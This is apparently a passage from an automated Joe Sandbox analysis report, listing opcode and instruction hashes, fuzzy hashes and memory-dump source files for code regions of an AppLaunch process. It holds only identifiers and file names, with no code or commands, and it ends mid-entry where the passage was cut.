                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40c085ef5aed5ef25f195505456a03a17c0cac3711bfc479059ea5e31150b63c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d827edb00807e39a6b58829d2a084f2a9e3cc5487f7e655216d2a94690b72f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA119032A80208CBCB14ABA9D8586EFBBF6EB88320F045069D505F7740DF719D51CAD0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 27863cbc745bebf464b9b17ee5836fffc26682c3ae3651d1682f1cb146883ec9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2886e9ce7de132f9c6d88eb8c9bc924bce64c9d8137dec3889dec2e6e37102b3
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27863cbc745bebf464b9b17ee5836fffc26682c3ae3651d1682f1cb146883ec9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E321AE35300254EFD7159B69D898D7ABBF9EF88315B108029FA8687350CB36EC80CB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 84466b509cb7e1df4565e969771fb6d95b8da1acb41e530d66ddd9ec261b4481
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 79d672b572e249e4552d68543312c20229b8a02556cd83fc2caafae664911946
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84466b509cb7e1df4565e969771fb6d95b8da1acb41e530d66ddd9ec261b4481
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521F331300301DBE311EB39E860BAE7BB6EF85354F00852DD6458B6A5EB74B905CBD0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b54bdd0d8c8f6731d76400d20443cbac8627e9ad0fbc6e9c519e04c7c8b79f4c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b57449036020b4512aa8d22185eb5da80e9ccc8c2940a83196ed353b0c6cffb6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b54bdd0d8c8f6731d76400d20443cbac8627e9ad0fbc6e9c519e04c7c8b79f4c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5219030A00216DFCB04CFA8D840AEEF7B4FF85304F0049AAE928DB651D371AA15CBA0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 34e520f562b0633df20760dab05bb931ef208536fc1dafc85cc58b46ad2513ed
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c779001522c3ed461cf2531c6b99e4a014f7f6ff71c3ea9aa58d0e2fbb9db2bb
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34e520f562b0633df20760dab05bb931ef208536fc1dafc85cc58b46ad2513ed
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06113630E043185FDF289BF8D8247BD3BB9EF46200F1400A9E509CB681DB386905CB92
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1dfaf4a2b9590eb1845e609e1b6acd3d01229a4b1659c939424ecc906b568f81
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3e91d4289017dace11177e9ecace0a8d6137fd06ca63fdc04151b926a3d9f66b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dfaf4a2b9590eb1845e609e1b6acd3d01229a4b1659c939424ecc906b568f81
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF11D0312007069FD705DF79E854A9EBBB6EFC9314B009929E60687225EB70AD458BD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d35c5e00e63d30c45b7c2622b38d9c4cfb48e7c422fc2112fdfe01de26c979bc
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 81f82de64ac9976acd3a480d63735f971607bc9ce9facd1260205bbc605e4416
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d35c5e00e63d30c45b7c2622b38d9c4cfb48e7c422fc2112fdfe01de26c979bc
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711E271700702CFD720DB69D454A5ABBB6FFC9324B14462DE94A8B710EB35EC018B94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c00c2f7244daf886707a186e477be607e9ee3788295a96a5a2a3bc5c95be4ef
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 67ec75d0aba570b7b729bb6c612b2feae5e74e27f8d6b98a5be9bfa2ee0214e7
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c00c2f7244daf886707a186e477be607e9ee3788295a96a5a2a3bc5c95be4ef
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD01493774A631AFE3115B28E940762F7A9FB85620F014132E504CB681DB35E883C7E0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e3f469779c5e6e39fb5e81499431b92d49e8957cc63a25687da355194a59bc73
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f28c886eb71322e0a5b0e3210a18789e7f4f46e6de3212dfcc1438891f89bf19
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3f469779c5e6e39fb5e81499431b92d49e8957cc63a25687da355194a59bc73
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A511903070071B9FDB14EB79E850BAEB7B6FF88204F104A29D5055B654EB74BC0A87D1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e734d7ef9855b06950e6b168eca33478fa7a3e45c61e01e6a8028b444f86bf9b
                                                                                                                                                                                                                                                                                                                  • Instruction ID: d58aeb56f233537cb47829fdcaa9e271778b8b8e8eaab262afa227b4189e0515
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e734d7ef9855b06950e6b168eca33478fa7a3e45c61e01e6a8028b444f86bf9b
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB110271700702CFDB20DF69D494A6ABBB6FFC8324704862CE50A8B710EB35EC018B90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c754cc7973a6fdcedc93497bbe8d2050c66bb9998ba8fff3430691ef29c27e9f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f60788497805778cf3c2765de27d7dbd5a3732f09d054fa349922abbbe5173e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c754cc7973a6fdcedc93497bbe8d2050c66bb9998ba8fff3430691ef29c27e9f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2611B230A0124ADFCB15EFB9F895AAC7BB1FF46308B2041ADC405DB251EB382E15DB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1232cbcd64e6c0aeaf985271cbaa0f27712313608244e0b32cf6c0de9f57d76d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4128c0c01c0f0be96d6b87f59a3f2bb27512bebd08f0b6bd7eb6ceec00e42d73
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1232cbcd64e6c0aeaf985271cbaa0f27712313608244e0b32cf6c0de9f57d76d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05111F30F00219CFDB44FBA8D954BAEB7B2EF88704F118259E515AB291DB749C51CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2625220282.0000000004EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EED000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4eed000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                                                                                                  • Instruction ID: d72ccff5b82991b1e5f2bcdc9fa5e1bdfd9b96c22052f89925601a5e5525d290
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A811E6B6504281DFCB16CF10D9C4F26BF71FB94328F24C5A9D8494B656C33AE45ACBA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2625220282.0000000004EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EED000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4eed000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9fb0d9d2df41b191459fa6b6353c096d249e007ef69f7c8946a7db391ecfbd53
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E11D376904241DFCB16CF14D9C4B26BF71FB84328F24C5A9D9090B256C33AE45ACBA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f99308bbf5988f200a203b3670a86e735c4a9652dfe793af712cf058ce070fa3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 086d173db95ed157f2fe1c0f94825f6c0aa87710f10061fa5a55ee3557c70b3c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f99308bbf5988f200a203b3670a86e735c4a9652dfe793af712cf058ce070fa3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0213070E0121ACFCB45EFA8D8549AEB7B1FF48304F11C569D529A7260EB349D52CF80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21b1cf0fd249509f8abab71b99b3780b5b0b64807ca9bddcf27b8d0ee5e1cb70
                                                                                                                                                                                                                                                                                                                  • Instruction ID: cc6df4a956b209dc014314ad0ffdcb0894afd5ac71a07c6b923ed26a8276e774
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21b1cf0fd249509f8abab71b99b3780b5b0b64807ca9bddcf27b8d0ee5e1cb70
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1019671745340AFD3089B799821626BFEAEFCA350F11807DEA09C7785EA31EC51C7A5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a537e2904a335698db66fc1ddd403ceba092881b68942b24e847aeedb520d11
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e5bc7d437debb3a6a3a6af4dfb1b4e20dab27da35a1dc5205cb398f7f4a973b5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a537e2904a335698db66fc1ddd403ceba092881b68942b24e847aeedb520d11
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32119A323002408FD719EB38E4A46BE7BA7EFC6314755486CC1428BA50CE38B8068B92
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 88649d230bc0f092ddb24948a2c643153c1363a46a36f050b308ca475e711f9a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 35131146fb0081e1d84b854ef15bd8c0e90b7cd2db7e22f080eccb9e3e9075e9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88649d230bc0f092ddb24948a2c643153c1363a46a36f050b308ca475e711f9a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53118839B401058FDB14DF75C484AADBBF2BF88320F1581A9E9029BBA1DB30DC91CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8dc4f68414754363ea40f5b0a2289e253a1321f4fc9533ee9c4d268e79cb68f4
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c10a8f2d600446dcbc98907de5b5317ee3601ec3d14c4454fc2f3f0add829fe4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dc4f68414754363ea40f5b0a2289e253a1321f4fc9533ee9c4d268e79cb68f4
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113A30B40605CFCF15CF65D5D48AAFBF6FF88304724849ADA05DBA65D731A920CB65
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3e6a6e77f886baebe8f02c3545dc3a3361a536986a34f5afc9a69dcbf0c418b6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d318b576e055b1283b4f4611b2ee5246bacbfc725035dd64472c45cd773a77d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e6a6e77f886baebe8f02c3545dc3a3361a536986a34f5afc9a69dcbf0c418b6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE016835208355CFE7118FAAD4A17FB7BB4EF85350F00443EDA01C7292C265AE44C3A0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626099935.00000000068AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 068AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_68ad000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: a4244f402ecd40b9715204626306e72a86328304547d815366abdf10886512ae
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11BEB5904344DFDB01CF10C5C4B19BB61FB84214F24C6AADE498B752C33AD44ACB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626099935.00000000068AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 068AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_68ad000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 13a17b32a4d52625cadd0f9ecc214952461d3c7e875772a6c7a986913f5e1172
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17895ef1a711c92fd90609d298abc29133f0d980216731687744a25e6c476644
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13a17b32a4d52625cadd0f9ecc214952461d3c7e875772a6c7a986913f5e1172
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0119075905384DFDB11CF10D5C4B19FB61FB84224F24C6A9DD498BA56C33AE40ACB92
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e7fcdc3c878a5b906ccf9f5acf097483e09ee11c704a16b35ada9d244028a3f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 86d68c76194a666b826d4be8853980bf2835333ee94fdcd52235f9607923c34a
